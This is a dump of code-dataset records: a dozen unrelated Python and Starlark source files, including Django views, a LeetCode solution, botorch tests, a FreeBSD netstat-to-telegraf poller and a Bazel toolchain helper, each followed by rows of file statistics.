    fire.Fire(generate_pipelines) | 50.990244 | 118 | 0.672534 | 1,052 | 10,453 | 6.224335 | 0.244297 | 0.107514 | 0.072694 | 0.058033 | 0.512065 | 0.446243 | 0.31964 | 0.209835 | 0.137752 | 0.112706 | 0 | 0.02989 | 0.235052 | 10,453 | 205 | 119 | 50.990244 | 0.78902 | 0.01368 | 0 | 0.321053 | 1 | 0 | 0.381733 | 0.35941 | 0 | 0 | 0 | 0 | 0 | 1 | 0.005263 | false | 0 | 0.126316 | 0 | 0.131579 | 0.005263 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
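`generate_pipelines` is table-driven: a dict maps primitive names to `(pipeline, datasets)` pairs, and the `gpu` flag decides whether the GPU-only primitives or everything else is processed. That selection logic can be sketched in isolation; the primitive names below are illustrative stand-ins, not the real D3M identifiers.

```python
# Hypothetical set of GPU-only primitive names (stand-ins for gpu_prims).
GPU_PRIMS = {'prim.gpu_a', 'prim.gpu_b'}


def select_primitives(prims_to_pipelines, gpu=False):
    """Keep GPU primitives when gpu=True, CPU-only primitives otherwise.

    Mirrors the continue-based filter at the top of the driver loop.
    """
    return {
        name: pipelines
        for name, pipelines in prims_to_pipelines.items()
        if (name in GPU_PRIMS) == gpu
    }
```

Calling it twice with the same mapping splits the work the way the two `continue` branches do.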
a16015f7fdd109191a18e2ce3c5cc5cd31b338c6 | 210 | py | Python | gorynych/ontologies/gch/edges/basic/__init__.py | vurmux/gorynych | d721e8cdb61f7c7ee6bc4bd31026605df15f2d9d | [
"Apache-2.0"
] | null | null | null | gorynych/ontologies/gch/edges/basic/__init__.py | vurmux/gorynych | d721e8cdb61f7c7ee6bc4bd31026605df15f2d9d | [
"Apache-2.0"
] | null | null | null | gorynych/ontologies/gch/edges/basic/__init__.py | vurmux/gorynych | d721e8cdb61f7c7ee6bc4bd31026605df15f2d9d | [
"Apache-2.0"
] | null | null | null | __all__ = [
    "aggregation",
    "association",
    "composition",
    "connection",
    "containment",
    "dependency",
    "includes",
    "membership",
    "ownership",
    "responsibility",
    "usage"
] | 16.153846 | 21 | 0.557143 | 12 | 210 | 9.416667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.27619 | 210 | 13 | 22 | 16.153846 | 0.743421 | 0 | 0 | 0 | 0 | 0 | 0.521327 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a163e601ea9b0587f0a7996da2ea54d7b047cc87 | 597 | py | Python | api_app/migrations/0001_initial.py | DurkinDevelopment/coinbase_api | 0cea72234d481d09ff906f7bc064cfe16111c785 | [
"MIT"
] | null | null | null | api_app/migrations/0001_initial.py | DurkinDevelopment/coinbase_api | 0cea72234d481d09ff906f7bc064cfe16111c785 | [
"MIT"
] | null | null | null | api_app/migrations/0001_initial.py | DurkinDevelopment/coinbase_api | 0cea72234d481d09ff906f7bc064cfe16111c785 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.12 on 2022-02-15 02:57
from django.db import migrations, models
class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='SpotPrice',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('currency', models.CharField(max_length=200)),
                ('amount', models.FloatField()),
                ('timestamp', models.DateField()),
            ],
        ),
    ]
| 24.875 | 117 | 0.562814 | 57 | 597 | 5.824561 | 0.77193 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046005 | 0.308208 | 597 | 23 | 118 | 25.956522 | 0.757869 | 0.077052 | 0 | 0 | 1 | 0 | 0.065574 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a163f9dace925925161f417c4fc2f6f13d99f9d2 | 924 | py | Python | Kalender/views.py | RamonvdW/nhb-apps | 5a9f840bfe066cd964174515c06b806a7b170c69 | [
"BSD-3-Clause-Clear"
] | 1 | 2021-12-22T13:11:12.000Z | 2021-12-22T13:11:12.000Z | Kalender/views.py | RamonvdW/nhb-apps | 5a9f840bfe066cd964174515c06b806a7b170c69 | [
"BSD-3-Clause-Clear"
] | 9 | 2020-10-28T07:07:05.000Z | 2021-06-28T20:05:37.000Z | Kalender/views.py | RamonvdW/nhb-apps | 5a9f840bfe066cd964174515c06b806a7b170c69 | [
"BSD-3-Clause-Clear"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2021 Ramon van der Winkel.
# All rights reserved.
# Licensed under BSD-3-Clause-Clear. See LICENSE file for details.
from django.views.generic import View
from django.urls import reverse
from django.http import HttpResponseRedirect
from Functie.rol import Rollen, rol_get_huidige
from .view_maand import get_url_huidige_maand
class KalenderLandingPageView(View):
    """ This page only redirects to one of the other pages,
        depending on the chosen role.
    """

    @staticmethod
    def get(request, *args, **kwargs):
        rol_nu = rol_get_huidige(request)
        if rol_nu == Rollen.ROL_BB:
            url = reverse('Kalender:manager')
        elif rol_nu == Rollen.ROL_HWL:
            url = reverse('Kalender:vereniging')
        else:
            url = get_url_huidige_maand()
        return HttpResponseRedirect(url)
# end of file
| 26.4 | 79 | 0.683983 | 122 | 924 | 5.04918 | 0.606557 | 0.048701 | 0.042208 | 0.058442 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008451 | 0.231602 | 924 | 34 | 80 | 27.176471 | 0.859155 | 0.290043 | 0 | 0 | 0 | 0 | 0.05538 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.3125 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
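The role dispatch inside `get()` is a small role-to-URL mapping. The same decision can be sketched as a pure function that is trivial to test; the string constants below are illustrative stand-ins for `Rollen.ROL_BB`/`Rollen.ROL_HWL` and for the URLs that Django's `reverse()` would produce.

```python
ROL_BB = 'BB'    # stand-in for Rollen.ROL_BB (national manager)
ROL_HWL = 'HWL'  # stand-in for Rollen.ROL_HWL (club role)


def landing_url(rol_nu, huidige_maand_url='/kalender/maand/'):
    """Pick the calendar landing page for the current role.

    Any other role falls through to the current-month view, matching
    the else-branch that calls get_url_huidige_maand().
    """
    if rol_nu == ROL_BB:
        return '/kalender/manager/'
    if rol_nu == ROL_HWL:
        return '/kalender/vereniging/'
    return huidige_maand_url
```

Keeping the branching in a pure function like this makes the redirect logic testable without a request object.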
a16900fa8a0412a37028d1da77ef8f912a14e56f | 259 | py | Python | Control/control_common.py | TomE8/drones | c92865556dd3df2d5f5b73589cd48e413bff3a3a | [
"MIT"
] | 14 | 2018-10-29T00:52:18.000Z | 2022-03-23T20:07:11.000Z | Control/control_common.py | TomE8/drones | c92865556dd3df2d5f5b73589cd48e413bff3a3a | [
"MIT"
] | 4 | 2020-07-12T05:19:05.000Z | 2020-09-20T12:40:47.000Z | Control/control_common.py | TomE8/drones | c92865556dd3df2d5f5b73589cd48e413bff3a3a | [
"MIT"
] | 2 | 2019-03-08T01:36:47.000Z | 2019-09-12T04:07:19.000Z |
class AxisIndex:  # TODO: read this value from config file
    LEFT_RIGHT = 0
    FORWARD_BACKWARDS = 1
    ROTATE = 2
    UP_DOWN = 3


class ButtonIndex:
    TRIGGER = 0
    SIDE_BUTTON = 1
    HOVERING = 2
    EXIT = 10

class ThresHold:
    SENDING_TIME = 0.5 | 17.266667 | 58 | 0.648649 | 37 | 259 | 4.405405 | 0.837838 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058201 | 0.27027 | 259 | 15 | 59 | 17.266667 | 0.804233 | 0.146718 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.066667 | 0 | 1 | 0 | false | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
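The index classes in `control_common.py` are plain namespaces of integers. If the project were free to change them, `enum.IntEnum` would give the same integer values plus readable names in reprs and iteration — this is a sketch of the equivalent, not the project's actual code.

```python
from enum import IntEnum


class AxisIndex(IntEnum):
    """Joystick axis positions; values match the original constants."""
    LEFT_RIGHT = 0
    FORWARD_BACKWARDS = 1
    ROTATE = 2
    UP_DOWN = 3


def read_axis(axes, which):
    """Index an axis list by enum member; works because IntEnum is an int."""
    return axes[which]
```

Because `IntEnum` members compare equal to their integer values, existing code that uses raw `0..3` indices keeps working unchanged.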
a16aadbd9d67147c97cce0ae81ac212da4c01e1c | 2,472 | py | Python | .leetcode/16.3-sum-closest.2.py | KuiyuanFu/PythonLeetCode | 8962df2fa838eb7ae48fa59de272ba55a89756d8 | [
"MIT"
] | null | null | null | .leetcode/16.3-sum-closest.2.py | KuiyuanFu/PythonLeetCode | 8962df2fa838eb7ae48fa59de272ba55a89756d8 | [
"MIT"
] | null | null | null | .leetcode/16.3-sum-closest.2.py | KuiyuanFu/PythonLeetCode | 8962df2fa838eb7ae48fa59de272ba55a89756d8 | [
"MIT"
] | null | null | null | # @lc app=leetcode id=16 lang=python3
#
# [16] 3Sum Closest
#
# https://leetcode.com/problems/3sum-closest/description/
#
# algorithms
# Medium (46.33%)
# Likes: 3080
# Dislikes: 169
# Total Accepted: 570.4K
# Total Submissions: 1.2M
# Testcase Example: '[-1,2,1,-4]\n1'
#
# Given an array nums of n integers and an integer target, find three integers
# in nums such that the sum is closest to target. Return the sum of the three
# integers. You may assume that each input would have exactly one solution.
#
#
# Example 1:
#
#
# Input: nums = [-1,2,1,-4], target = 1
# Output: 2
# Explanation: The sum that is closest to the target is 2. (-1 + 2 + 1 =
# 2).
#
#
#
# Constraints:
#
#
# 3 <= nums.length <= 10^3
# -10^3 <= nums[i] <= 10^3
# -10^4 <= target <= 10^4
#
#
#
# @lc tags=array;two-pointers
# @lc imports=start
from imports import *
# @lc imports=end
# @lc idea=start
#
# Given an array, find the sum of three elements that is closest to the target.
# Use the two-pointer technique: first sort the array and fix the first value, then scan the rest of the array with two pointers for the smallest difference. Because the array is sorted, moving the left/right pointer controls whether the sum of the remaining two numbers grows or shrinks. Duplicates are skipped to prune the search.
#
# @lc idea=end
# @lc group=two-pointers
# @lc rank=10
# @lc code=start
class Solution:
    def threeSumClosest(self, nums: List[int], target: int) -> int:
        # dic = {}
        # for n in nums:
        #     if not dic.__contains__(n):
        #         dic[n] = 1
        #     elif dic[n] < 3:
        #         dic[n] += 1
        # nums = []
        # for i in list(dic.keys()):
        #     nums += [i] * dic[i]
        nums.sort()
        s = nums[0] + nums[1] + nums[2]
        dif = abs(s - target)
        for i in range(len(nums) - 2):
            # Skip duplicate first elements.
            if i > 0 and nums[i] == nums[i - 1]:
                continue
            l = i + 1
            r = len(nums) - 1
            t = target - nums[i]
            while l < r:
                if abs(t - nums[l] - nums[r]) < dif:
                    dif = abs(t - nums[l] - nums[r])
                    s = nums[i] + nums[l] + nums[r]
                # Decide which direction to move the pointers.
                if t - nums[l] - nums[r] > 0:
                    l = l + 1
                else:
                    r = r - 1
                if dif == 0:
                    break
        return s

    pass
# @lc code=end
# @lc main=start
if __name__ == '__main__':
    print('Example 1:')
    print('Input : ')
    print('nums = [-1,2,1,-4], target = 1')
    print('Output :')
    print(str(Solution().threeSumClosest([-1, 2, 1, -4], 1)))
    print('Expected :')
    print('2')

    print()
    pass
# @lc main=end | 22.071429 | 95 | 0.506068 | 340 | 2,472 | 3.644118 | 0.376471 | 0.009685 | 0.012107 | 0.012914 | 0.05569 | 0.046812 | 0.024213 | 0 | 0 | 0 | 0 | 0.052632 | 0.338997 | 2,472 | 112 | 96 | 22.071429 | 0.70563 | 0.479773 | 0 | 0.058824 | 0 | 0 | 0.062193 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029412 | false | 0.058824 | 0.029412 | 0 | 0.117647 | 0.235294 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
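The idea comment above describes a sort-plus-two-pointer scan. A standalone re-implementation of the same algorithm, free of the LeetCode harness (no `from imports import *`), can be run and checked directly:

```python
def three_sum_closest(nums, target):
    """Two-pointer scan over a sorted copy; returns the closest triple sum."""
    nums = sorted(nums)
    best = nums[0] + nums[1] + nums[2]
    for i in range(len(nums) - 2):
        if i > 0 and nums[i] == nums[i - 1]:
            continue  # skip duplicate first elements
        lo, hi = i + 1, len(nums) - 1
        while lo < hi:
            total = nums[i] + nums[lo] + nums[hi]
            if abs(total - target) < abs(best - target):
                best = total
            if total < target:
                lo += 1   # need a larger sum
            elif total > target:
                hi -= 1   # need a smaller sum
            else:
                return total  # exact match, cannot do better
    return best
```

On the example input, `three_sum_closest([-1, 2, 1, -4], 1)` returns `2`, matching the expected output above.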
a16be12b3f57a68c02b41dfe786a31910f86a92e | 2,142 | py | Python | test/test_functions/test_michalewicz.py | carefree0910/botorch | c0b252baba8f16a4ea2eb3f99c266fba47418b1f | [
"MIT"
] | null | null | null | test/test_functions/test_michalewicz.py | carefree0910/botorch | c0b252baba8f16a4ea2eb3f99c266fba47418b1f | [
"MIT"
] | null | null | null | test/test_functions/test_michalewicz.py | carefree0910/botorch | c0b252baba8f16a4ea2eb3f99c266fba47418b1f | [
"MIT"
] | 1 | 2019-05-07T23:53:08.000Z | 2019-05-07T23:53:08.000Z | #! /usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import unittest
import torch
from botorch.test_functions.michalewicz import (
    GLOBAL_MAXIMIZER,
    GLOBAL_MAXIMUM,
    neg_michalewicz,
)


class TestNegMichalewicz(unittest.TestCase):
    def test_single_eval_neg_michalewicz(self, cuda=False):
        device = torch.device("cuda") if cuda else torch.device("cpu")
        for dtype in (torch.float, torch.double):
            X = torch.zeros(10, device=device, dtype=dtype)
            res = neg_michalewicz(X)
            self.assertEqual(res.dtype, dtype)
            self.assertEqual(res.device.type, device.type)
            self.assertEqual(res.shape, torch.Size())

    def test_single_eval_neg_michalewicz_cuda(self):
        if torch.cuda.is_available():
            self.test_single_eval_neg_michalewicz(cuda=True)

    def test_batch_eval_neg_michalewicz(self, cuda=False):
        device = torch.device("cuda") if cuda else torch.device("cpu")
        for dtype in (torch.float, torch.double):
            X = torch.zeros(2, 10, device=device, dtype=dtype)
            res = neg_michalewicz(X)
            self.assertEqual(res.dtype, dtype)
            self.assertEqual(res.device.type, device.type)
            self.assertEqual(res.shape, torch.Size([2]))

    def test_batch_eval_neg_michalewicz_cuda(self):
        if torch.cuda.is_available():
            self.test_batch_eval_neg_michalewicz(cuda=True)

    def test_neg_michalewicz_global_maximum(self, cuda=False):
        device = torch.device("cuda") if cuda else torch.device("cpu")
        for dtype in (torch.float, torch.double):
            X = torch.tensor(
                GLOBAL_MAXIMIZER, device=device, dtype=dtype, requires_grad=True
            )
            res = neg_michalewicz(X)
            res.backward()
            self.assertAlmostEqual(res.item(), GLOBAL_MAXIMUM, places=4)
            self.assertLess(X.grad.abs().max().item(), 1e-3)

    def test_neg_michalewicz_global_maximum_cuda(self):
        if torch.cuda.is_available():
            self.test_neg_michalewicz_global_maximum(cuda=True)
| 38.25 | 80 | 0.661531 | 272 | 2,142 | 5.018382 | 0.257353 | 0.133333 | 0.079121 | 0.064469 | 0.712821 | 0.712821 | 0.605861 | 0.557509 | 0.557509 | 0.52967 | 0 | 0.006075 | 0.231559 | 2,142 | 55 | 81 | 38.945455 | 0.823208 | 0.042484 | 0 | 0.372093 | 0 | 0 | 0.010249 | 0 | 0 | 0 | 0 | 0 | 0.186047 | 1 | 0.139535 | false | 0 | 0.069767 | 0 | 0.232558 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a172ea5b14e8133a222d02986a593e89323cad7c | 847 | py | Python | FreeBSD/bsd_netstats_poller.py | failedrequest/telegraf-plugins | 9cda0612a912f219fa84724f12af1f428483a37a | [
"BSD-2-Clause"
] | null | null | null | FreeBSD/bsd_netstats_poller.py | failedrequest/telegraf-plugins | 9cda0612a912f219fa84724f12af1f428483a37a | [
"BSD-2-Clause"
] | null | null | null | FreeBSD/bsd_netstats_poller.py | failedrequest/telegraf-plugins | 9cda0612a912f219fa84724f12af1f428483a37a | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python3
# 3/21/2021
# Updated for python3
# A Simple sysctl to telegraf plugin for freebsd's netstats ip info
from freebsd_sysctl import Sysctl as sysctl
import subprocess as sp
import re
import json
import sys
import pprint as pp
hostname = sysctl("kern.hostname").value
netstat_data = {}
points_netstat = {}
netstat_output = sp.check_output(["netstat", "-s", "-p", "ip", "--libxo", "json", "/dev/null"], universal_newlines=True)
netstat_data = json.loads(netstat_output)

for x in netstat_data["statistics"]:
    for k, v in netstat_data["statistics"][x].items():
        points_netstat[k] = v


def points_to_influx(points):
    # Use the argument that was passed in, not the module-level dict
    field_tags = ",".join(["{k}={v}".format(k=str(x[0]), v=x[1]) for x in list(points.items())])
    print(("bsd_netstat,type=netstat {}").format(field_tags))

points_to_influx(points_netstat)
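The `points_to_influx` join builds the field set of an InfluxDB line-protocol record (`<measurement>,<tag_set> <field_set>`). Isolated from the sysctl/netstat calls it is easy to verify; the field names below are illustrative, not actual netstat counters, and field ordering follows dict insertion order (Python 3.7+).

```python
def influx_line(measurement, tags, fields):
    """Render one InfluxDB line-protocol record (timestamp omitted)."""
    tag_part = ",".join("{}={}".format(k, v) for k, v in tags.items())
    field_part = ",".join("{}={}".format(k, v) for k, v in fields.items())
    return "{},{} {}".format(measurement, tag_part, field_part)
```

For example, `influx_line('bsd_netstat', {'type': 'netstat'}, {'packets-received': 10})` yields the same shape of line that the poller prints for telegraf's exec input.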
| 22.289474 | 119 | 0.709563 | 131 | 847 | 4.435115 | 0.496183 | 0.075732 | 0.020654 | 0.079174 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015007 | 0.134593 | 847 | 37 | 120 | 22.891892 | 0.777626 | 0.138135 | 0 | 0 | 0 | 0 | 0.140278 | 0.033333 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.333333 | 0 | 0.388889 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
a1773cd4561ed64fe6472e04a837e283a5378aa9 | 1,763 | py | Python | data/ebmnlp/stream.py | bepnye/tf_ner | c68b9f489e56e0ec8cfb02b7115d2b07d721ac6f | [
"Apache-2.0"
] | null | null | null | data/ebmnlp/stream.py | bepnye/tf_ner | c68b9f489e56e0ec8cfb02b7115d2b07d721ac6f | [
"Apache-2.0"
] | null | null | null | data/ebmnlp/stream.py | bepnye/tf_ner | c68b9f489e56e0ec8cfb02b7115d2b07d721ac6f | [
"Apache-2.0"
] | null | null | null | import os
import data_utils
from pathlib import Path
top_path = Path(os.path.dirname(os.path.abspath(__file__)))
EBM_NLP = Path('/Users/ben/Desktop/ebm_nlp/repo/ebm_nlp_2_00/')
NO_LABEL = '0'
def overwrite_tags(new_tags, tags):
    for i, t in enumerate(new_tags):
        if t != NO_LABEL:
            tags[i] = t


def get_tags(d):
    pmid_tags = {}
    for e in ['participants', 'interventions', 'outcomes']:
        for a in (EBM_NLP / 'annotations' / 'aggregated' / 'starting_spans' / e / d).glob('*.ann'):
            pmid = a.stem.split('.')[0]
            tags = a.open().read().split()
            tags = [e[0] if t == '1' else NO_LABEL for t in tags]
            if pmid not in pmid_tags:
                pmid_tags[pmid] = tags
            else:
                overwrite_tags(tags, pmid_tags[pmid])
    return pmid_tags


def get_words(pmids):
    return {pmid: (EBM_NLP / 'documents' / '{}.tokens'.format(pmid)).open().read().split() for pmid in pmids}


def get_seqs(tag_d, word_d, keys):
    tag_seqs = []
    word_seqs = []
    for k in keys:
        words, tags = data_utils.generate_seqs(word_d[k], tag_d[k])
        tag_seqs += tags
        word_seqs += words
    return word_seqs, tag_seqs


TRAIN_TAG_D = get_tags(Path('train/'))
TRAIN_PMIDS = sorted(TRAIN_TAG_D.keys())
TRAIN_WORD_D = get_words(TRAIN_PMIDS)
TRAIN_WORDS, TRAIN_TAGS = get_seqs(TRAIN_TAG_D, TRAIN_WORD_D, TRAIN_PMIDS)

TEST_TAG_D = get_tags(Path('test/gold/'))
TEST_PMIDS = sorted(TEST_TAG_D.keys())
TEST_WORD_D = get_words(TEST_PMIDS)
TEST_WORDS, TEST_TAGS = get_seqs(TEST_TAG_D, TEST_WORD_D, TEST_PMIDS)


def train_words():
    return TRAIN_WORDS


def train_tags():
    return TRAIN_TAGS


def test_words():
    return TEST_WORDS


def test_tags():
    return TEST_TAGS


def word_embeddings():
    return ((top_path / '..' / 'embeddings' / 'glove.840B.300d.txt').open(), 300)
| 28.435484 | 109 | 0.683494 | 289 | 1,763 | 3.868512 | 0.259516 | 0.028623 | 0.0322 | 0.028623 | 0.026834 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010944 | 0.170732 | 1,763 | 61 | 110 | 28.901639 | 0.753762 | 0 | 0 | 0 | 0 | 0 | 0.105502 | 0.025525 | 0 | 0 | 0 | 0 | 0 | 1 | 0.18 | false | 0 | 0.06 | 0.12 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
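`overwrite_tags` in the stream module implements a layered merge in which the `'0'` NO_LABEL value never overwrites an existing label, so the participant, intervention and outcome spans stack onto one tag sequence per abstract. A standalone copy of the helper shows that behaviour:

```python
NO_LABEL = '0'


def overwrite_tags(new_tags, tags):
    # Copy of the helper above: only real labels replace what is present;
    # NO_LABEL positions leave earlier annotations untouched.
    for i, t in enumerate(new_tags):
        if t != NO_LABEL:
            tags[i] = t
```

Merging `['0', 'i', 'i', '0']` into `['p', 'p', '0', '0']` keeps the first `'p'`, replaces the second with `'i'`, and fills the third slot.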
a17f75ddc89a6583319e9dcd13c17dded131aa22 | 1,259 | bzl | Python | tools/build_defs/native_tools/tool_access.bzl | slsyy/rules_foreign_cc | 34ab7f86a3ab1b2381cb4820d08a1c892f55bf54 | [
"Apache-2.0"
] | null | null | null | tools/build_defs/native_tools/tool_access.bzl | slsyy/rules_foreign_cc | 34ab7f86a3ab1b2381cb4820d08a1c892f55bf54 | [
"Apache-2.0"
] | null | null | null | tools/build_defs/native_tools/tool_access.bzl | slsyy/rules_foreign_cc | 34ab7f86a3ab1b2381cb4820d08a1c892f55bf54 | [
"Apache-2.0"
] | null | null | null | # buildifier: disable=module-docstring
load(":native_tools_toolchain.bzl", "access_tool")
def get_cmake_data(ctx):
    return _access_and_expect_label_copied("@rules_foreign_cc//tools/build_defs:cmake_toolchain", ctx, "cmake")

def get_ninja_data(ctx):
    return _access_and_expect_label_copied("@rules_foreign_cc//tools/build_defs:ninja_toolchain", ctx, "ninja")

def get_make_data(ctx):
    return _access_and_expect_label_copied("@rules_foreign_cc//tools/build_defs:make_toolchain", ctx, "make")

def _access_and_expect_label_copied(toolchain_type_, ctx, tool_name):
    tool_data = access_tool(toolchain_type_, ctx, tool_name)
    if tool_data.target:
        # This could be made more efficient by changing the
        # toolchain to provide the executable as a target
        cmd_file = tool_data
        for f in tool_data.target.files.to_list():
            if f.path.endswith("/" + tool_data.path):
                cmd_file = f
                break
        return struct(
            deps = [tool_data.target],
            # as the tool will be copied into tools directory
            path = "$EXT_BUILD_ROOT/{}".format(cmd_file.path),
        )
    else:
        return struct(
            deps = [],
            path = tool_data.path,
        )
| 38.151515 | 111 | 0.669579 | 170 | 1,259 | 4.6 | 0.382353 | 0.071611 | 0.076726 | 0.102302 | 0.351662 | 0.257033 | 0.257033 | 0.257033 | 0.257033 | 0.257033 | 0 | 0 | 0.232724 | 1,259 | 32 | 112 | 39.34375 | 0.809524 | 0.144559 | 0 | 0.083333 | 0 | 0 | 0.208022 | 0.166978 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0.125 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
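The file lookup in `_access_and_expect_label_copied` scans the tool target's files for the one whose path ends with `"/" + tool_data.path`. The `.bzl` file itself is Starlark, so the following is just the same suffix match re-sketched in Python for a quick check of the logic:

```python
def find_tool_file(paths, tool_path):
    """Return the first path ending in '/<tool_path>', else None.

    Mirrors the loop over tool_data.target.files in the Starlark helper.
    """
    suffix = "/" + tool_path
    for p in paths:
        if p.endswith(suffix):
            return p
    return None
```

The suffix includes the leading slash so that, for example, a `README` or a `cmake.txt` sibling never matches when looking for `cmake`.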
a1823c37136cd59bed9a94266ef25fc93fb40d71 | 255 | py | Python | gallery/photo/urls.py | andyjohn23/django-photo | e65ee3ab6fdad3a9d836d32b7f1026efcc728a41 | [
"MIT"
] | null | null | null | gallery/photo/urls.py | andyjohn23/django-photo | e65ee3ab6fdad3a9d836d32b7f1026efcc728a41 | [
"MIT"
] | null | null | null | gallery/photo/urls.py | andyjohn23/django-photo | e65ee3ab6fdad3a9d836d32b7f1026efcc728a41 | [
"MIT"
] | null | null | null | from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name="index"),
path('category/<category>/', views.CategoryListView.as_view(), name="category"),
path('search/', views.image_search, name='image-search'),
] | 31.875 | 84 | 0.686275 | 31 | 255 | 5.580645 | 0.483871 | 0.127168 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129412 | 255 | 8 | 85 | 31.875 | 0.779279 | 0 | 0 | 0 | 0 | 0 | 0.203125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a183121368090836638181c5ae887b713f923588 | 6,358 | py | Python | fedsimul/models/mnist/mclr.py | cshjin/fedsimul | 1e2b9a9d9034fbc679dfaff059c42dea5642971d | [
"MIT"
] | 11 | 2021-05-07T01:28:26.000Z | 2022-03-10T08:23:16.000Z | fedsimul/models/mnist/mclr.py | cshjin/fedsimul | 1e2b9a9d9034fbc679dfaff059c42dea5642971d | [
"MIT"
] | 2 | 2021-08-13T10:12:13.000Z | 2021-08-31T02:03:20.000Z | fedsimul/models/mnist/mclr.py | cshjin/fedsimul | 1e2b9a9d9034fbc679dfaff059c42dea5642971d | [
"MIT"
] | 1 | 2021-06-08T07:23:22.000Z | 2021-06-08T07:23:22.000Z | import numpy as np
import tensorflow as tf
from tqdm import trange
from fedsimul.utils.model_utils import batch_data
from fedsimul.utils.tf_utils import graph_size
from fedsimul.utils.tf_utils import process_grad
class Model(object):
'''
This is the tf model for the MNIST dataset with multiple class learner regression.
Images are 28px by 28px.
'''
def __init__(self, num_classes, optimizer, gpu_id=0, seed=1):
""" Initialize the learner.
Args:
num_classes: int
optimizer: tf.train.Optimizer
gpu_id: int, default 0
seed: int, default 1
"""
# params
self.num_classes = num_classes
